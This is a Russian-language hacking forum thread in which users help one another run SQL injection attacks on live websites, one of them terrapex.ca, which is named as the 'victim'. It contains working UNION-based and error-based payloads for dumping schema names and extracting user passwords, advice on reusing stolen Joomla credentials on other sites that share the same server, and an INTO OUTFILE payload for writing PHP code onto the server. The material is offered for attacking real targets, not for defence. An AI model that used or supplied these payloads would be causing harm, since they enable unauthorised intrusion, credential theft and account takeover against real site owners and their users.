Подскажите: жертва - ttp://www.terrapex.ca/en/realisation.php?larealisation=Environmental+Compliance+Audit&id=16 узнаю названия таблиц - ttp://terrapex.ca/en/realisation.php?larealisation=Environmental+Compliance+Audit&id=-16 union select 1,group_concat(table_name),3,4,5,6 from information_schema.tables where table_schema=database() узнаю название столбцов - http://terrapex.ca/en/realisation.php?larealisation=Environmental+Compliance+Audit&id=-16 union select 1,group_concat(column_name),3,4,5,6 from information_schema.columns where table_schema=database() на выходе имею такую связку (таблица - user, столбцы - userName,userPass) ww.terrapex.ca/en/realisation.php?larealisation=Environmental+Compliance+Audit&id=-16 union select 1,group_concat(userPass),3,4,5,6 from users и получаю: Invalid query: Unknown column 'userPass' in 'field list' Уязвимость разбираю из соседнего раздела /threadnav21336-1550-10.html - нашел её YaBTR и вот вариант рабочий: ttp://www.terrapex.ca/en/nouvelle.php?lanouvelle=&id=22+union+select+1,group_concat(userpwd,0x3a,user rights),version(),4,5+from+users-- Где и как найти эти userpwd,0x3a,user rights
может просто внимательней быть? >>Где и как найти эти userpwd,0x3a,user rights 0x3a - это хекс код разделителя, а остальные - названия столбцов таблицы. Как найти написано в статье Dr.Zero
действительно, описАлся. Но, увы, не помогло читал не раз статью эту и нетолько её. про хекс это понятно, просто вставил. попробую конкретнее задать вопрос. может ли быть такое что только брут форсом будут подобраны названия столбцов? Или всё-таки их можно выудить?
Code: http://terrapex.ca/en/realisation.php?larealisation=x&id=(16)and(0)union+select+1,(select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_schema=database())and(0x00)in(@x:=concat(@x,0x3c62723e,table_schema,0x2e,[B][COLOR=DarkOrange]table_name[/COLOR][/B],0x3a,column_name))))x),3,4,5,6--+ Code: http://terrapex.ca/en/realisation.php?larealisation=x&id=(16)and(0)union+select+1,(select(@x)from(select(@x:=0x00),(select(0)from([B][COLOR=DarkOrange]web_terrapex_ca.intranetusers[/COLOR][/B])where(0x00)in(@x:=concat(@x,0x3c62723e,userName,0x3a,userPass))))x),3,4,5,6--+ Code: http://terrapex.ca/en/realisation.php?larealisation=x&id=(16)and(0)union+select+1,(select(@x)from(select(@x:=0x00),(select(0)from([B][COLOR=DarkOrange]web_terrapex_ca.users[/COLOR][/B])where(0x00)in(@x:=concat(@x,0x3c62723e,userrights,0x3a,userpwd))))x),3,4,5,6--+
хтонить в курсе, есть ли в БД ждомлы запись о том какой домен пренадлежит базе? ато так пробежался и ничего путного не нашол
Точный адрес в БД Jooml'ы не прописан, наксколько мне известно, но возможно возможно подскажет следующее: 1. Select email from jos_users where usertype='Super Administrator' Смотрим мыло админа, довольно часто бывает что в названии админского мыла указывается источник на домен, например admin@искомый_домен.com. Если же нет, и там просто мыло типа mail.ru, то можно пройти сюда 2ip.ru/domain-list-by-email/, вести полученное мыло, и если повезет и поиск выдаст какие-то домены, найти те, сайты которых на Jooml'e. Возможно искомый домен окажется в этом списке. 2. Select title from jos_categories Получаем заголовки страниц, хранящихся в БД. Далее идем в гугл и составляем поисковый запрос, что-то типа intitle:"Полученный title". Опять таки, если повезет, то в выдаче гугла можно найти сайт по искомому заголовку. 3. Просто посмотреть на сайты, находящиеся на этом ip, если их там не много, и не влом этим заниматься, то отсеять все, которые не на Jooml'e, ну а в оставшиеся попытаться войти, используя полученные данные из jos_users. Авось повезет. Но, это все конечно не панацея и не дает 100% результат в поиске искомого домена. Так, информация к размышлению, скорее
Подскажите возможно ли как-то автоматически скопировать все ссылки сайтов из гугла по определённому запросу,чтоб не копировать всё по одному?Спасибо.
В случае с phpbb все гораздо прозрачнее. PHP: SELECT config_value FROM phpbb_config WHERE config_name='server_name' Получаем домен, на котором расположен форум. PHP: SELECT config_value FROM phpbb_config WHERE config_name='script_path' Получаем конечную папку с форумом, доступную из веба.
При подстановке разных параметров в значения через POST, увидел такую ошибку PHP: INSERT INTO `ap_form_0` (`ip_address`,`date_created`) VALUES ('мой ip','2013-07-14 15:59:15'); Query failed: Table 'formy.ap_form_0' doesn't exist это ошибка возникает если подставить "-" в параметр, если кавычку то все работает без ошибок, как то можно что то с этим сделать, и как я понял он не может найти указанную таблицу, то есть если и можно, то придется подбирать имя таблицы и поля?
Если эти значения, включая и ип передаются через POST, можно попробовать вручную вызвать ошибку, в которой будет выведена интересующая информация, конечно если там и ' не фильтруются.
какие бы я запросы не вводил в уязвимый параметр все равно все остается также как я написал выше, разве что время меняется... PHP: SELECT * FROM `ap_form_-1_review` WHERE id='' Query failed: Table 'zodiacsi_formy.ap_form_-1_review' doesn't exist еще нашел вот это... есть параметр id= если туда ввести значение -1 то выйдет вот это
Хм, интересный случай... А если ввести так... Code: Сначала поищем количество полей в таблице ap_form_1_review id=1[COLOR=Yellow]` order by 1 --[/COLOR] id=1[COLOR=Yellow]` order by 100 --[/COLOR] id=1[COLOR=Yellow]` union select 1,2,3,4,5 --[/COLOR] Ну или попробовать вариант с error-based Code: id=1[COLOR=Yellow]` union select * from(select * from(select NAME_CONST((select version()), 14)d) as t join (select NAME_CONST((select version()), 14)e) b)a --[/COLOR] А вообще хотелось бы увидеть линк в ПМ, можно поэкспериментировать...
Так же не будет работать, если правильную таблицу указать, например: Code: id=1_review` [COLOR=Red]SQL[/COLOR] -- 1 Voinmraka, у вас же инъекция в имени таблицы...
SELECT * FROM `ap_form_-1_review` Хм, точно, просмотрел что там ещё окончание таблицы дописывается. Ну значит просто добавлять id=1_review` order by 1 -- и по аналогии
Подскажите пожалуйста, как в MySQL выполнить запрос into outfile в такой конструкции: script.php?id=(1)and(extractvalue(0x3b,concat(0x3b,(select+version())))) Имею мускуль рута и не экранирующиеся кавычки, команда load_file() работает нормально, но как только я пытаюсь сделать следующий запрос: script.php?id=(1)and(extractvalue(0x3b,concat(0x3b,(select+user+from+table+into+outfile+'C:\tmp\test.php')))) мускуль мне выдаёт ошибку: Code: ...блаблабла MySQL server version for the right syntax to use near 'into outfile 'C:\tmp\test.php'))))and' На сервере винда, и интерпретатор ASP, а база данных мускуль.... есть ли возможность записи в файл в подобном случае?
Нет смысла использовать extractvalue при записи(При чтении - да) в файл в error-based инъекциях, дейлайте как это обычно делается...
Насколько я помню, при extractvalue не действует способ into outfile. Попробуй так Code: or (select count(*) from (select 1 union select 2 union select 3)x group by concat((select 1 into outfile '[COLOR=Yellow]/usr/home/www/test.php[/COLOR]' lines terminated by "[COLOR=Yellow]<? php code ?>[/COLOR]"),floor(rand(0)*2))) Судя по всему с пробелами у тебя запара. Но, думаю, в "скобочный" вариант переделать сам сможешь.